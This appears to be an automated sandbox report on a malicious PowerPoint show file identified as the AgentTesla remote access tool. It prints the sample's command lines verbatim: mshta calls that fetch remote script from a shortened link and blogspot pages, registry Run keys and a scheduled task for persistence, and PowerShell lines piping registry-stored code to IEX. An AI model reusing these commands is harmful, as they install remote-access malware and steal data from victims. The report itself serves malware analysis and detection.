Analysis
- max time kernel: 86s
- max time network: 138s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 24-02-2021 18:39

Tasks:
- Static task static1
- Behavioral task behavioral1: sample 25.pps, resource win7v20201028
- Behavioral task behavioral2: sample 25.pps, resource win10v20201028
General
- Target: 25.pps
- Size: 143KB
- MD5: c475bbc0142c89758cb3f15625f5dee7
- SHA1: eea1ff58d1a0b6a471f9a34d97b102c2cd0a3431
- SHA256: 7df670fa6de80e87fa03dfba84f5777054d5a55737f8fce07679a637342250a3
- SHA512: 241a3575dd78dcc2b4f20d20a46f53f4910c7e613ba1dba87b5dd7c9aaa4cc5ebf83784c2560e60fee5ad11732cb3a36a445a6cc82ae851e10367fbbdda8ad9f
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 1980 | 3300 | mSHtA.exe | POWERPNT.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 3852 | 3300 | ping.exe | POWERPNT.EXE
-
AgentTesla Payload 2 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3304-66-0x0000000000400000-0x000000000043E000-memory.dmp | family_agenttesla
  behavioral2/memory/3304-67-0x000000000043828E-mapping.dmp | family_agenttesla
-
Blocklisted process makes network request 13 IoCs
Processes:
  flow | pid | process
  30 | 1980 | mSHtA.exe
  32 | 1980 | mSHtA.exe
  34 | 1980 | mSHtA.exe
  36 | 1980 | mSHtA.exe
  41 | 1980 | mSHtA.exe
  43 | 1980 | mSHtA.exe
  44 | 1980 | mSHtA.exe
  45 | 1980 | mSHtA.exe
  47 | 1980 | mSHtA.exe
  49 | 1980 | mSHtA.exe
  51 | 1980 | mSHtA.exe
  52 | 1980 | mSHtA.exe
  57 | 3124 | Powershell.exe
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run | mSHtA.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" | mSHtA.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" | mSHtA.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/19.html\"\", 0 : window.close\")" | mSHtA.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/19.html\"\", 0 : window.close\")" | mSHtA.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")" | mSHtA.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description | pid | process | target process
  PID 3124 set thread context of 3304 | 3124 | Powershell.exe | aspnet_compiler.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
  pid | pid_target | process | target process
  2972 | 1980 | WerFault.exe | mSHtA.exe
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
-
Kills process with taskkill 2 IoCs
Processes:
  pid | process
  2668 | taskkill.exe
  1280 | taskkill.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
  pid | process
  3300 | POWERPNT.EXE
  3688 | winword.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
  pid | process
  2972 | WerFault.exe (15 occurrences)
  1472 | Powershell.exe (3 occurrences)
  3124 | Powershell.exe (3 occurrences)
  3304 | aspnet_compiler.exe (2 occurrences)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2668 | taskkill.exe
  Token: SeDebugPrivilege | 1280 | taskkill.exe
  Token: SeDebugPrivilege | 2972 | WerFault.exe
  Token: SeDebugPrivilege | 1472 | Powershell.exe
  Token: SeDebugPrivilege | 3124 | Powershell.exe
  1472 Powershell.exe then adjusted, in this order (21 IoCs): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  3124 Powershell.exe then adjusted the same 21 tokens in the same order (21 IoCs)
  3124 Powershell.exe then adjusted the same sequence a second time, SeIncreaseQuotaPrivilege through SeManageVolumePrivilege, without the trailing 33, 34, 35, 36 (17 IoCs)
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
  pid | process
  3300 | POWERPNT.EXE (2 occurrences)
  3688 | winword.exe (3 occurrences)
-
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
  description | pid | process | target process
  PID 3300 wrote to memory of 1980 | 3300 | POWERPNT.EXE | mSHtA.exe (2 occurrences)
  PID 3300 wrote to memory of 3852 | 3300 | POWERPNT.EXE | ping.exe (2 occurrences)
  PID 3300 wrote to memory of 3688 | 3300 | POWERPNT.EXE | winword.exe (2 occurrences)
  PID 1980 wrote to memory of 1404 | 1980 | mSHtA.exe | schtasks.exe (2 occurrences)
  PID 1980 wrote to memory of 3124 | 1980 | mSHtA.exe | Powershell.exe (3 occurrences)
  PID 1980 wrote to memory of 1472 | 1980 | mSHtA.exe | Powershell.exe (3 occurrences)
  PID 1980 wrote to memory of 2668 | 1980 | mSHtA.exe | taskkill.exe (2 occurrences)
  PID 1980 wrote to memory of 1280 | 1980 | mSHtA.exe | taskkill.exe (2 occurrences)
  PID 3124 wrote to memory of 3304 | 3124 | Powershell.exe | aspnet_compiler.exe (8 occurrences)
Processes
Indentation and the bracketed number give the depth in the process tree; each entry is a child of the nearest less-indented entry above it.
-
[1] C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
-
    [2] C:\Windows\SYSTEM32\mSHtA.exe
        Command line: mSHtA http://12384928198391823%12384928198391823@j.mp/akawasdiaodiasdokwnduhand
        - Process spawned unexpected child process
        - Blocklisted process makes network request
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory
-
        [3] C:\Windows\System32\schtasks.exe
            Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/19.html""\"", 0 : window.close"\")
            - Creates scheduled task(s)
-
        [3] C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
            Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
            - Blocklisted process makes network request
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
-
            [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                - Suspicious behavior: EnumeratesProcesses
-
        [3] C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
            Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
-
        [3] C:\Windows\System32\taskkill.exe
            Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
-
        [3] C:\Windows\System32\taskkill.exe
            Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
-
        [3] C:\Windows\system32\WerFault.exe
            Command line: C:\Windows\system32\WerFault.exe -u -p 1980 -s 2884
            - Program crash
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
-
    [2] C:\Windows\SYSTEM32\ping.exe
        Command line: ping
        - Process spawned unexpected child process
        - Runs ping.exe
-
    [2] C:\Program Files\Microsoft Office\Root\Office16\winword.exe
        Command line: winword
        - Checks processor information in registry
        - Enumerates system info in registry
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5: c2d06c11dd1f1a8b1dedc1a311ca8cdc
  SHA1: 75c07243f9cb80a9c7aed2865f9c5192cc920e7e
  SHA256: 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
  SHA512: db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d